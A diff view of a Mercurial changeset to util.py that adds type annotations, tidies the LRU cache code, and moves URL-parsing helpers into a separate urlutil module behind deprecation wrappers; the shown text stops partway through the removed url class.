mercurial/util.py
branchstable
changeset 46993 f67b8946bb1b
parent 46926 9c3e84569071
child 47012 d55b71393907
child 47062 f38bf44e077f
equal deleted inserted replaced
46810:bc268ea9f984 46993:f67b8946bb1b
     1 # util.py - Mercurial utility functions and platform specific implementations
     1 # util.py - Mercurial utility functions and platform specific implementations
     2 #
     2 #
     3 #  Copyright 2005 K. Thananchayan <thananck@yahoo.com>
     3 #  Copyright 2005 K. Thananchayan <thananck@yahoo.com>
     4 #  Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
     4 #  Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
     5 #  Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
     5 #  Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
     6 #
     6 #
     7 # This software may be used and distributed according to the terms of the
     7 # This software may be used and distributed according to the terms of the
     8 # GNU General Public License version 2 or any later version.
     8 # GNU General Public License version 2 or any later version.
     9 
     9 
    26 import mmap
    26 import mmap
    27 import os
    27 import os
    28 import platform as pyplatform
    28 import platform as pyplatform
    29 import re as remod
    29 import re as remod
    30 import shutil
    30 import shutil
    31 import socket
       
    32 import stat
    31 import stat
    33 import sys
    32 import sys
    34 import time
    33 import time
    35 import traceback
    34 import traceback
    36 import warnings
    35 import warnings
    55 from .utils import (
    54 from .utils import (
    56     compression,
    55     compression,
    57     hashutil,
    56     hashutil,
    58     procutil,
    57     procutil,
    59     stringutil,
    58     stringutil,
       
    59     urlutil,
    60 )
    60 )
       
    61 
       
    62 if pycompat.TYPE_CHECKING:
       
    63     from typing import (
       
    64         Iterator,
       
    65         List,
       
    66         Optional,
       
    67         Tuple,
       
    68     )
       
    69 
    61 
    70 
    62 base85 = policy.importmod('base85')
    71 base85 = policy.importmod('base85')
    63 osutil = policy.importmod('osutil')
    72 osutil = policy.importmod('osutil')
    64 
    73 
    65 b85decode = base85.b85decode
    74 b85decode = base85.b85decode
   131 unlink = platform.unlink
   140 unlink = platform.unlink
   132 username = platform.username
   141 username = platform.username
   133 
   142 
   134 
   143 
   135 def setumask(val):
   144 def setumask(val):
       
   145     # type: (int) -> None
   136     ''' updates the umask. used by chg server '''
   146     ''' updates the umask. used by chg server '''
   137     if pycompat.iswindows:
   147     if pycompat.iswindows:
   138         return
   148         return
   139     os.umask(val)
   149     os.umask(val)
   140     global umask
   150     global umask
   305                     % (k, v, self._digester[k])
   315                     % (k, v, self._digester[k])
   306                 )
   316                 )
   307 
   317 
   308 
   318 
   309 try:
   319 try:
   310     buffer = buffer
   320     buffer = buffer  # pytype: disable=name-error
   311 except NameError:
   321 except NameError:
   312 
   322 
   313     def buffer(sliceable, offset=0, length=None):
   323     def buffer(sliceable, offset=0, length=None):
   314         if length is not None:
   324         if length is not None:
   315             return memoryview(sliceable)[offset : offset + length]
   325             return memoryview(sliceable)[offset : offset + length]
  1252 
  1262 
  1253     def preparewrite(self):
  1263     def preparewrite(self):
  1254         """call this before writes, return self or a copied new object"""
  1264         """call this before writes, return self or a copied new object"""
  1255         if getattr(self, '_copied', 0):
  1265         if getattr(self, '_copied', 0):
  1256             self._copied -= 1
  1266             self._copied -= 1
  1257             return self.__class__(self)
  1267             # Function cow.__init__ expects 1 arg(s), got 2 [wrong-arg-count]
       
  1268             return self.__class__(self)  # pytype: disable=wrong-arg-count
  1258         return self
  1269         return self
  1259 
  1270 
  1260     def copy(self):
  1271     def copy(self):
  1261         """always do a cheap copy"""
  1272         """always do a cheap copy"""
  1262         self._copied = getattr(self, '_copied', 0) + 1
  1273         self._copied = getattr(self, '_copied', 0) + 1
  1283             del self[key]
  1294             del self[key]
  1284         super(sortdict, self).__setitem__(key, value)
  1295         super(sortdict, self).__setitem__(key, value)
  1285 
  1296 
  1286     if pycompat.ispypy:
  1297     if pycompat.ispypy:
  1287         # __setitem__() isn't called as of PyPy 5.8.0
  1298         # __setitem__() isn't called as of PyPy 5.8.0
  1288         def update(self, src):
  1299         def update(self, src, **f):
  1289             if isinstance(src, dict):
  1300             if isinstance(src, dict):
  1290                 src = pycompat.iteritems(src)
  1301                 src = pycompat.iteritems(src)
  1291             for k, v in src:
  1302             for k, v in src:
  1292                 self[k] = v
  1303                 self[k] = v
       
  1304             for k in f:
       
  1305                 self[k] = f[k]
  1293 
  1306 
  1294     def insert(self, position, key, value):
  1307     def insert(self, position, key, value):
  1295         for (i, (k, v)) in enumerate(list(self.items())):
  1308         for (i, (k, v)) in enumerate(list(self.items())):
  1296             if i == position:
  1309             if i == position:
  1297                 self[key] = value
  1310                 self[key] = value
  1393     """
  1406     """
  1394 
  1407 
  1395     __slots__ = ('next', 'prev', 'key', 'value', 'cost')
  1408     __slots__ = ('next', 'prev', 'key', 'value', 'cost')
  1396 
  1409 
  1397     def __init__(self):
  1410     def __init__(self):
  1398         self.next = None
  1411         self.next = self
  1399         self.prev = None
  1412         self.prev = self
  1400 
  1413 
  1401         self.key = _notset
  1414         self.key = _notset
  1402         self.value = None
  1415         self.value = None
  1403         self.cost = 0
  1416         self.cost = 0
  1404 
  1417 
  1433     """
  1446     """
  1434 
  1447 
  1435     def __init__(self, max, maxcost=0):
  1448     def __init__(self, max, maxcost=0):
  1436         self._cache = {}
  1449         self._cache = {}
  1437 
  1450 
  1438         self._head = head = _lrucachenode()
  1451         self._head = _lrucachenode()
  1439         head.prev = head
       
  1440         head.next = head
       
  1441         self._size = 1
  1452         self._size = 1
  1442         self.capacity = max
  1453         self.capacity = max
  1443         self.totalcost = 0
  1454         self.totalcost = 0
  1444         self.maxcost = maxcost
  1455         self.maxcost = maxcost
  1445 
  1456 
  1540         Unlike get(), this doesn't mutate the internal state. But be aware
  1551         Unlike get(), this doesn't mutate the internal state. But be aware
  1541         that it doesn't mean peek() is thread safe.
  1552         that it doesn't mean peek() is thread safe.
  1542         """
  1553         """
  1543         try:
  1554         try:
  1544             node = self._cache[k]
  1555             node = self._cache[k]
       
  1556             assert node is not None  # help pytype
  1545             return node.value
  1557             return node.value
  1546         except KeyError:
  1558         except KeyError:
  1547             if default is _notset:
  1559             if default is _notset:
  1548                 raise
  1560                 raise
  1549             return default
  1561             return default
  1597             return
  1609             return
  1598 
  1610 
  1599         # Walk the linked list backwards starting at tail node until we hit
  1611         # Walk the linked list backwards starting at tail node until we hit
  1600         # a non-empty node.
  1612         # a non-empty node.
  1601         n = self._head.prev
  1613         n = self._head.prev
       
  1614 
       
  1615         assert n is not None  # help pytype
       
  1616 
  1602         while n.key is _notset:
  1617         while n.key is _notset:
  1603             n = n.prev
  1618             n = n.prev
  1604 
  1619 
  1605         assert n is not None  # help pytype
  1620         assert n is not None  # help pytype
  1606 
  1621 
  1831     # PyPy runs slower with gc disabled
  1846     # PyPy runs slower with gc disabled
  1832     nogc = lambda x: x
  1847     nogc = lambda x: x
  1833 
  1848 
  1834 
  1849 
  1835 def pathto(root, n1, n2):
  1850 def pathto(root, n1, n2):
       
  1851     # type: (bytes, bytes, bytes) -> bytes
  1836     """return the relative path from one place to another.
  1852     """return the relative path from one place to another.
  1837     root should use os.sep to separate directories
  1853     root should use os.sep to separate directories
  1838     n1 should use os.sep to separate directories
  1854     n1 should use os.sep to separate directories
  1839     n2 should use "/" to separate directories
  1855     n2 should use "/" to separate directories
  1840     returns an os.sep-separated path.
  1856     returns an os.sep-separated path.
  2015 }
  2031 }
  2016 _winreservedchars = b':*?"<>|'
  2032 _winreservedchars = b':*?"<>|'
  2017 
  2033 
  2018 
  2034 
  2019 def checkwinfilename(path):
  2035 def checkwinfilename(path):
       
  2036     # type: (bytes) -> Optional[bytes]
  2020     r"""Check that the base-relative path is a valid filename on Windows.
  2037     r"""Check that the base-relative path is a valid filename on Windows.
  2021     Returns None if the path is ok, or a UI string describing the problem.
  2038     Returns None if the path is ok, or a UI string describing the problem.
  2022 
  2039 
  2023     >>> checkwinfilename(b"just/a/normal/path")
  2040     >>> checkwinfilename(b"just/a/normal/path")
  2024     >>> checkwinfilename(b"foo/bar/con.xml")
  2041     >>> checkwinfilename(b"foo/bar/con.xml")
  2109     os.write(ld, info)
  2126     os.write(ld, info)
  2110     os.close(ld)
  2127     os.close(ld)
  2111 
  2128 
  2112 
  2129 
  2113 def readlock(pathname):
  2130 def readlock(pathname):
       
  2131     # type: (bytes) -> bytes
  2114     try:
  2132     try:
  2115         return readlink(pathname)
  2133         return readlink(pathname)
  2116     except OSError as why:
  2134     except OSError as why:
  2117         if why.errno not in (errno.EINVAL, errno.ENOSYS):
  2135         if why.errno not in (errno.EINVAL, errno.ENOSYS):
  2118             raise
  2136             raise
  2132 
  2150 
  2133 # File system features
  2151 # File system features
  2134 
  2152 
  2135 
  2153 
  2136 def fscasesensitive(path):
  2154 def fscasesensitive(path):
       
  2155     # type: (bytes) -> bool
  2137     """
  2156     """
  2138     Return true if the given path is on a case-sensitive filesystem
  2157     Return true if the given path is on a case-sensitive filesystem
  2139 
  2158 
  2140     Requires a path (like /foo/.hg) ending with a foldable final
  2159     Requires a path (like /foo/.hg) ending with a foldable final
  2141     directory component.
  2160     directory component.
  2168 
  2187 
  2169 class _re(object):
  2188 class _re(object):
  2170     def _checkre2(self):
  2189     def _checkre2(self):
  2171         global _re2
  2190         global _re2
  2172         global _re2_input
  2191         global _re2_input
       
  2192 
       
  2193         check_pattern = br'\[([^\[]+)\]'
       
  2194         check_input = b'[ui]'
  2173         try:
  2195         try:
  2174             # check if match works, see issue3964
  2196             # check if match works, see issue3964
  2175             check_pattern = br'\[([^\[]+)\]'
       
  2176             check_input = b'[ui]'
       
  2177             _re2 = bool(re2.match(check_pattern, check_input))
  2197             _re2 = bool(re2.match(check_pattern, check_input))
  2178         except ImportError:
  2198         except ImportError:
  2179             _re2 = False
  2199             _re2 = False
  2180         except TypeError:
  2200         except TypeError:
  2181             # the `pyre-2` project provides a re2 module that accept bytes
  2201             # the `pyre-2` project provides a re2 module that accept bytes
  2224 
  2244 
  2225 _fspathcache = {}
  2245 _fspathcache = {}
  2226 
  2246 
  2227 
  2247 
  2228 def fspath(name, root):
  2248 def fspath(name, root):
       
  2249     # type: (bytes, bytes) -> bytes
  2229     """Get name in the case stored in the filesystem
  2250     """Get name in the case stored in the filesystem
  2230 
  2251 
  2231     The name should be relative to root, and be normcase-ed for efficiency.
  2252     The name should be relative to root, and be normcase-ed for efficiency.
  2232 
  2253 
  2233     Note that this function is unnecessary, and should not be
  2254     Note that this function is unnecessary, and should not be
  2268 
  2289 
  2269     return b''.join(result)
  2290     return b''.join(result)
  2270 
  2291 
  2271 
  2292 
  2272 def checknlink(testfile):
  2293 def checknlink(testfile):
       
  2294     # type: (bytes) -> bool
  2273     '''check whether hardlink count reporting works properly'''
  2295     '''check whether hardlink count reporting works properly'''
  2274 
  2296 
  2275     # testfile may be open, so we need a separate file for checking to
  2297     # testfile may be open, so we need a separate file for checking to
  2276     # work around issue2543 (or testfile may get lost on Samba shares)
  2298     # work around issue2543 (or testfile may get lost on Samba shares)
  2277     f1, f2, fp = None, None, None
  2299     f1, f2, fp = None, None, None
  2301             except OSError:
  2323             except OSError:
  2302                 pass
  2324                 pass
  2303 
  2325 
  2304 
  2326 
  2305 def endswithsep(path):
  2327 def endswithsep(path):
       
  2328     # type: (bytes) -> bool
  2306     '''Check path ends with os.sep or os.altsep.'''
  2329     '''Check path ends with os.sep or os.altsep.'''
  2307     return (
  2330     return bool(  # help pytype
  2308         path.endswith(pycompat.ossep)
  2331         path.endswith(pycompat.ossep)
  2309         or pycompat.osaltsep
  2332         or pycompat.osaltsep
  2310         and path.endswith(pycompat.osaltsep)
  2333         and path.endswith(pycompat.osaltsep)
  2311     )
  2334     )
  2312 
  2335 
  2313 
  2336 
  2314 def splitpath(path):
  2337 def splitpath(path):
       
  2338     # type: (bytes) -> List[bytes]
  2315     """Split path by os.sep.
  2339     """Split path by os.sep.
  2316     Note that this function does not use os.altsep because this is
  2340     Note that this function does not use os.altsep because this is
  2317     an alternative of simple "xxx.split(os.sep)".
  2341     an alternative of simple "xxx.split(os.sep)".
  2318     It is recommended to use os.path.normpath() before using this
  2342     It is recommended to use os.path.normpath() before using this
  2319     function if need."""
  2343     function if need."""
  2538         else:
  2562         else:
  2539             self.close()
  2563             self.close()
  2540 
  2564 
  2541 
  2565 
  2542 def unlinkpath(f, ignoremissing=False, rmdir=True):
  2566 def unlinkpath(f, ignoremissing=False, rmdir=True):
       
  2567     # type: (bytes, bool, bool) -> None
  2543     """unlink and remove the directory if it is empty"""
  2568     """unlink and remove the directory if it is empty"""
  2544     if ignoremissing:
  2569     if ignoremissing:
  2545         tryunlink(f)
  2570         tryunlink(f)
  2546     else:
  2571     else:
  2547         unlink(f)
  2572         unlink(f)
  2552         except OSError:
  2577         except OSError:
  2553             pass
  2578             pass
  2554 
  2579 
  2555 
  2580 
  2556 def tryunlink(f):
  2581 def tryunlink(f):
       
  2582     # type: (bytes) -> None
  2557     """Attempt to remove a file, ignoring ENOENT errors."""
  2583     """Attempt to remove a file, ignoring ENOENT errors."""
  2558     try:
  2584     try:
  2559         unlink(f)
  2585         unlink(f)
  2560     except OSError as e:
  2586     except OSError as e:
  2561         if e.errno != errno.ENOENT:
  2587         if e.errno != errno.ENOENT:
  2562             raise
  2588             raise
  2563 
  2589 
  2564 
  2590 
  2565 def makedirs(name, mode=None, notindexed=False):
  2591 def makedirs(name, mode=None, notindexed=False):
       
  2592     # type: (bytes, Optional[int], bool) -> None
  2566     """recursive directory creation with parent mode inheritance
  2593     """recursive directory creation with parent mode inheritance
  2567 
  2594 
  2568     Newly created directories are marked as "not to be indexed by
  2595     Newly created directories are marked as "not to be indexed by
  2569     the content indexing service", if ``notindexed`` is specified
  2596     the content indexing service", if ``notindexed`` is specified
  2570     for "write" mode access.
  2597     for "write" mode access.
  2590     if mode is not None:
  2617     if mode is not None:
  2591         os.chmod(name, mode)
  2618         os.chmod(name, mode)
  2592 
  2619 
  2593 
  2620 
  2594 def readfile(path):
  2621 def readfile(path):
       
  2622     # type: (bytes) -> bytes
  2595     with open(path, b'rb') as fp:
  2623     with open(path, b'rb') as fp:
  2596         return fp.read()
  2624         return fp.read()
  2597 
  2625 
  2598 
  2626 
  2599 def writefile(path, text):
  2627 def writefile(path, text):
       
  2628     # type: (bytes, bytes) -> None
  2600     with open(path, b'wb') as fp:
  2629     with open(path, b'wb') as fp:
  2601         fp.write(text)
  2630         fp.write(text)
  2602 
  2631 
  2603 
  2632 
  2604 def appendfile(path, text):
  2633 def appendfile(path, text):
       
  2634     # type: (bytes, bytes) -> None
  2605     with open(path, b'ab') as fp:
  2635     with open(path, b'ab') as fp:
  2606         fp.write(text)
  2636         fp.write(text)
  2607 
  2637 
  2608 
  2638 
  2609 class chunkbuffer(object):
  2639 class chunkbuffer(object):
  2761 
  2791 
  2762     return go
  2792     return go
  2763 
  2793 
  2764 
  2794 
  2765 def processlinerange(fromline, toline):
  2795 def processlinerange(fromline, toline):
       
  2796     # type: (int, int) -> Tuple[int, int]
  2766     """Check that linerange <fromline>:<toline> makes sense and return a
  2797     """Check that linerange <fromline>:<toline> makes sense and return a
  2767     0-based range.
  2798     0-based range.
  2768 
  2799 
  2769     >>> processlinerange(10, 20)
  2800     >>> processlinerange(10, 20)
  2770     (9, 20)
  2801     (9, 20)
  2820 # stray CR is an error.
  2851 # stray CR is an error.
  2821 _eolre = remod.compile(br'\r*\n')
  2852 _eolre = remod.compile(br'\r*\n')
  2822 
  2853 
  2823 
  2854 
  2824 def tolf(s):
  2855 def tolf(s):
       
  2856     # type: (bytes) -> bytes
  2825     return _eolre.sub(b'\n', s)
  2857     return _eolre.sub(b'\n', s)
  2826 
  2858 
  2827 
  2859 
  2828 def tocrlf(s):
  2860 def tocrlf(s):
       
  2861     # type: (bytes) -> bytes
  2829     return _eolre.sub(b'\r\n', s)
  2862     return _eolre.sub(b'\r\n', s)
  2830 
  2863 
  2831 
  2864 
  2832 def _crlfwriter(fp):
  2865 def _crlfwriter(fp):
  2833     return transformingwriter(fp, tocrlf)
  2866     return transformingwriter(fp, tocrlf)
  2887     def iterfile(fp):
  2920     def iterfile(fp):
  2888         return fp
  2921         return fp
  2889 
  2922 
  2890 
  2923 
  2891 def iterlines(iterator):
  2924 def iterlines(iterator):
       
  2925     # type: (Iterator[bytes]) -> Iterator[bytes]
  2892     for chunk in iterator:
  2926     for chunk in iterator:
  2893         for line in chunk.splitlines():
  2927         for line in chunk.splitlines():
  2894             yield line
  2928             yield line
  2895 
  2929 
  2896 
  2930 
  2897 def expandpath(path):
  2931 def expandpath(path):
       
  2932     # type: (bytes) -> bytes
  2898     return os.path.expanduser(os.path.expandvars(path))
  2933     return os.path.expanduser(os.path.expandvars(path))
  2899 
  2934 
  2900 
  2935 
  2901 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
  2936 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
  2902     """Return the result of interpolating items in the mapping into string s.
  2937     """Return the result of interpolating items in the mapping into string s.
  2922         mapping[prefix_char] = prefix_char
  2957         mapping[prefix_char] = prefix_char
  2923     r = remod.compile(br'%s(%s)' % (prefix, patterns))
  2958     r = remod.compile(br'%s(%s)' % (prefix, patterns))
  2924     return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
  2959     return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
  2925 
  2960 
  2926 
  2961 
  2927 def getport(port):
  2962 def getport(*args, **kwargs):
  2928     """Return the port for a given network service.
  2963     msg = b'getport(...) moved to mercurial.utils.urlutil'
  2929 
  2964     nouideprecwarn(msg, b'6.0', stacklevel=2)
  2930     If port is an integer, it's returned as is. If it's a string, it's
  2965     return urlutil.getport(*args, **kwargs)
  2931     looked up using socket.getservbyname(). If there's no matching
  2966 
  2932     service, error.Abort is raised.
  2967 
  2933     """
  2968 def url(*args, **kwargs):
  2934     try:
  2969     msg = b'url(...) moved to mercurial.utils.urlutil'
  2935         return int(port)
  2970     nouideprecwarn(msg, b'6.0', stacklevel=2)
  2936     except ValueError:
  2971     return urlutil.url(*args, **kwargs)
  2937         pass
  2972 
  2938 
  2973 
  2939     try:
  2974 def hasscheme(*args, **kwargs):
  2940         return socket.getservbyname(pycompat.sysstr(port))
  2975     msg = b'hasscheme(...) moved to mercurial.utils.urlutil'
  2941     except socket.error:
  2976     nouideprecwarn(msg, b'6.0', stacklevel=2)
  2942         raise error.Abort(
  2977     return urlutil.hasscheme(*args, **kwargs)
  2943             _(b"no port number associated with service '%s'") % port
  2978 
  2944         )
  2979 
  2945 
  2980 def hasdriveletter(*args, **kwargs):
  2946 
  2981     msg = b'hasdriveletter(...) moved to mercurial.utils.urlutil'
  2947 class url(object):
  2982     nouideprecwarn(msg, b'6.0', stacklevel=2)
  2948     r"""Reliable URL parser.
  2983     return urlutil.hasdriveletter(*args, **kwargs)
  2949 
  2984 
  2950     This parses URLs and provides attributes for the following
  2985 
  2951     components:
  2986 def urllocalpath(*args, **kwargs):
  2952 
  2987     msg = b'urllocalpath(...) moved to mercurial.utils.urlutil'
  2953     <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
  2988     nouideprecwarn(msg, b'6.0', stacklevel=2)
  2954 
  2989     return urlutil.urllocalpath(*args, **kwargs)
  2955     Missing components are set to None. The only exception is
  2990 
  2956     fragment, which is set to '' if present but empty.
  2991 
  2957 
  2992 def checksafessh(*args, **kwargs):
  2958     If parsefragment is False, fragment is included in query. If
  2993     msg = b'checksafessh(...) moved to mercurial.utils.urlutil'
  2959     parsequery is False, query is included in path. If both are
  2994     nouideprecwarn(msg, b'6.0', stacklevel=2)
  2960     False, both fragment and query are included in path.
  2995     return urlutil.checksafessh(*args, **kwargs)
  2961 
  2996 
  2962     See http://www.ietf.org/rfc/rfc2396.txt for more information.
  2997 
  2963 
  2998 def hidepassword(*args, **kwargs):
  2964     Note that for backward compatibility reasons, bundle URLs do not
  2999     msg = b'hidepassword(...) moved to mercurial.utils.urlutil'
  2965     take host names. That means 'bundle://../' has a path of '../'.
  3000     nouideprecwarn(msg, b'6.0', stacklevel=2)
  2966 
  3001     return urlutil.hidepassword(*args, **kwargs)
  2967     Examples:
  3002 
  2968 
  3003 
  2969     >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
  3004 def removeauth(*args, **kwargs):
  2970     <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
  3005     msg = b'removeauth(...) moved to mercurial.utils.urlutil'
  2971     >>> url(b'ssh://[::1]:2200//home/joe/repo')
  3006     nouideprecwarn(msg, b'6.0', stacklevel=2)
  2972     <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
  3007     return urlutil.removeauth(*args, **kwargs)
  2973     >>> url(b'file:///home/joe/repo')
       
  2974     <url scheme: 'file', path: '/home/joe/repo'>
       
  2975     >>> url(b'file:///c:/temp/foo/')
       
  2976     <url scheme: 'file', path: 'c:/temp/foo/'>
       
  2977     >>> url(b'bundle:foo')
       
  2978     <url scheme: 'bundle', path: 'foo'>
       
  2979     >>> url(b'bundle://../foo')
       
  2980     <url scheme: 'bundle', path: '../foo'>
       
  2981     >>> url(br'c:\foo\bar')
       
  2982     <url path: 'c:\\foo\\bar'>
       
  2983     >>> url(br'\\blah\blah\blah')
       
  2984     <url path: '\\\\blah\\blah\\blah'>
       
  2985     >>> url(br'\\blah\blah\blah#baz')
       
  2986     <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
       
  2987     >>> url(br'file:///C:\users\me')
       
  2988     <url scheme: 'file', path: 'C:\\users\\me'>
       
  2989 
       
  2990     Authentication credentials:
       
  2991 
       
  2992     >>> url(b'ssh://joe:xyz@x/repo')
       
  2993     <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
       
  2994     >>> url(b'ssh://joe@x/repo')
       
  2995     <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
       
  2996 
       
  2997     Query strings and fragments:
       
  2998 
       
  2999     >>> url(b'http://host/a?b#c')
       
  3000     <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
       
  3001     >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
       
  3002     <url scheme: 'http', host: 'host', path: 'a?b#c'>
       
  3003 
       
  3004     Empty path:
       
  3005 
       
  3006     >>> url(b'')
       
  3007     <url path: ''>
       
  3008     >>> url(b'#a')
       
  3009     <url path: '', fragment: 'a'>
       
  3010     >>> url(b'http://host/')
       
  3011     <url scheme: 'http', host: 'host', path: ''>
       
  3012     >>> url(b'http://host/#a')
       
  3013     <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
       
  3014 
       
  3015     Only scheme:
       
  3016 
       
  3017     >>> url(b'http:')
       
  3018     <url scheme: 'http'>
       
  3019     """
       
  3020 
       
  3021     _safechars = b"!~*'()+"
       
  3022     _safepchars = b"/!~*'()+:\\"
       
  3023     _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
       
  3024 
       
  3025     def __init__(self, path, parsequery=True, parsefragment=True):
       
  3026         # We slowly chomp away at path until we have only the path left
       
  3027         self.scheme = self.user = self.passwd = self.host = None
       
  3028         self.port = self.path = self.query = self.fragment = None
       
  3029         self._localpath = True
       
  3030         self._hostport = b''
       
  3031         self._origpath = path
       
  3032 
       
  3033         if parsefragment and b'#' in path:
       
  3034             path, self.fragment = path.split(b'#', 1)
       
  3035 
       
  3036         # special case for Windows drive letters and UNC paths
       
  3037         if hasdriveletter(path) or path.startswith(b'\\\\'):
       
  3038             self.path = path
       
  3039             return
       
  3040 
       
  3041         # For compatibility reasons, we can't handle bundle paths as
       
  3042         # normal URLS
       
  3043         if path.startswith(b'bundle:'):
       
  3044             self.scheme = b'bundle'
       
  3045             path = path[7:]
       
  3046             if path.startswith(b'//'):
       
  3047                 path = path[2:]
       
  3048             self.path = path
       
  3049             return
       
  3050 
       
  3051         if self._matchscheme(path):
       
  3052             parts = path.split(b':', 1)
       
  3053             if parts[0]:
       
  3054                 self.scheme, path = parts
       
  3055                 self._localpath = False
       
  3056 
       
  3057         if not path:
       
  3058             path = None
       
  3059             if self._localpath:
       
  3060                 self.path = b''
       
  3061                 return
       
  3062         else:
       
  3063             if self._localpath:
       
  3064                 self.path = path
       
  3065                 return
       
  3066 
       
  3067             if parsequery and b'?' in path:
       
  3068                 path, self.query = path.split(b'?', 1)
       
  3069                 if not path:
       
  3070                     path = None
       
  3071                 if not self.query:
       
  3072                     self.query = None
       
  3073 
       
  3074             # // is required to specify a host/authority
       
  3075             if path and path.startswith(b'//'):
       
  3076                 parts = path[2:].split(b'/', 1)
       
  3077                 if len(parts) > 1:
       
  3078                     self.host, path = parts
       
  3079                 else:
       
  3080                     self.host = parts[0]
       
  3081                     path = None
       
  3082                 if not self.host:
       
  3083                     self.host = None
       
  3084                     # path of file:///d is /d
       
  3085                     # path of file:///d:/ is d:/, not /d:/
       
  3086                     if path and not hasdriveletter(path):
       
  3087                         path = b'/' + path
       
  3088 
       
  3089             if self.host and b'@' in self.host:
       
  3090                 self.user, self.host = self.host.rsplit(b'@', 1)
       
  3091                 if b':' in self.user:
       
  3092                     self.user, self.passwd = self.user.split(b':', 1)
       
  3093                 if not self.host:
       
  3094                     self.host = None
       
  3095 
       
  3096             # Don't split on colons in IPv6 addresses without ports
       
  3097             if (
       
  3098                 self.host
       
  3099                 and b':' in self.host
       
  3100                 and not (
       
  3101                     self.host.startswith(b'[') and self.host.endswith(b']')
       
  3102                 )
       
  3103             ):
       
  3104                 self._hostport = self.host
       
  3105                 self.host, self.port = self.host.rsplit(b':', 1)
       
  3106                 if not self.host:
       
  3107                     self.host = None
       
  3108 
       
  3109             if (
       
  3110                 self.host
       
  3111                 and self.scheme == b'file'
       
  3112                 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
       
  3113             ):
       
  3114                 raise error.Abort(
       
  3115                     _(b'file:// URLs can only refer to localhost')
       
  3116                 )
       
  3117 
       
  3118         self.path = path
       
  3119 
       
  3120         # leave the query string escaped
       
  3121         for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
       
  3122             v = getattr(self, a)
       
  3123             if v is not None:
       
  3124                 setattr(self, a, urlreq.unquote(v))
       
  3125 
       
  3126     @encoding.strmethod
       
  3127     def __repr__(self):
       
  3128         attrs = []
       
  3129         for a in (
       
  3130             b'scheme',
       
  3131             b'user',
       
  3132             b'passwd',
       
  3133             b'host',
       
  3134             b'port',
       
  3135             b'path',
       
  3136             b'query',
       
  3137             b'fragment',
       
  3138         ):
       
  3139             v = getattr(self, a)
       
  3140             if v is not None:
       
  3141                 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
       
  3142         return b'<url %s>' % b', '.join(attrs)
       
  3143 
       
  3144     def __bytes__(self):
       
  3145         r"""Join the URL's components back into a URL string.
       
  3146 
       
  3147         Examples:
       
  3148 
       
  3149         >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
       
  3150         'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
       
  3151         >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
       
  3152         'http://user:pw@host:80/?foo=bar&baz=42'
       
  3153         >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
       
  3154         'http://user:pw@host:80/?foo=bar%3dbaz'
       
  3155         >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
       
  3156         'ssh://user:pw@[::1]:2200//home/joe#'
       
  3157         >>> bytes(url(b'http://localhost:80//'))
       
  3158         'http://localhost:80//'
       
  3159         >>> bytes(url(b'http://localhost:80/'))
       
  3160         'http://localhost:80/'
       
  3161         >>> bytes(url(b'http://localhost:80'))
       
  3162         'http://localhost:80/'
       
  3163         >>> bytes(url(b'bundle:foo'))
       
  3164         'bundle:foo'
       
  3165         >>> bytes(url(b'bundle://../foo'))
       
  3166         'bundle:../foo'
       
  3167         >>> bytes(url(b'path'))
       
  3168         'path'
       
  3169         >>> bytes(url(b'file:///tmp/foo/bar'))
       
  3170         'file:///tmp/foo/bar'
       
  3171         >>> bytes(url(b'file:///c:/tmp/foo/bar'))
       
  3172         'file:///c:/tmp/foo/bar'
       
  3173         >>> print(url(br'bundle:foo\bar'))
       
  3174         bundle:foo\bar
       
  3175         >>> print(url(br'file:///D:\data\hg'))
       
  3176         file:///D:\data\hg
       
  3177         """
       
  3178         if self._localpath:
       
  3179             s = self.path
       
  3180             if self.scheme == b'bundle':
       
  3181                 s = b'bundle:' + s
       
  3182             if self.fragment:
       
  3183                 s += b'#' + self.fragment
       
  3184             return s
       
  3185 
       
  3186         s = self.scheme + b':'
       
  3187         if self.user or self.passwd or self.host:
       
  3188             s += b'//'
       
  3189         elif self.scheme and (
       
  3190             not self.path
       
  3191             or self.path.startswith(b'/')
       
  3192             or hasdriveletter(self.path)
       
  3193         ):
       
  3194             s += b'//'
       
  3195             if hasdriveletter(self.path):
       
  3196                 s += b'/'
       
  3197         if self.user:
       
  3198             s += urlreq.quote(self.user, safe=self._safechars)
       
  3199         if self.passwd:
       
  3200             s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
       
  3201         if self.user or self.passwd:
       
  3202             s += b'@'
       
  3203         if self.host:
       
  3204             if not (self.host.startswith(b'[') and self.host.endswith(b']')):
       
  3205                 s += urlreq.quote(self.host)
       
  3206             else:
       
  3207                 s += self.host
       
  3208         if self.port:
       
  3209             s += b':' + urlreq.quote(self.port)
       
  3210         if self.host:
       
  3211             s += b'/'
       
  3212         if self.path:
       
  3213             # TODO: similar to the query string, we should not unescape the
       
  3214             # path when we store it, the path might contain '%2f' = '/',
       
  3215             # which we should *not* escape.
       
  3216             s += urlreq.quote(self.path, safe=self._safepchars)
       
  3217         if self.query:
       
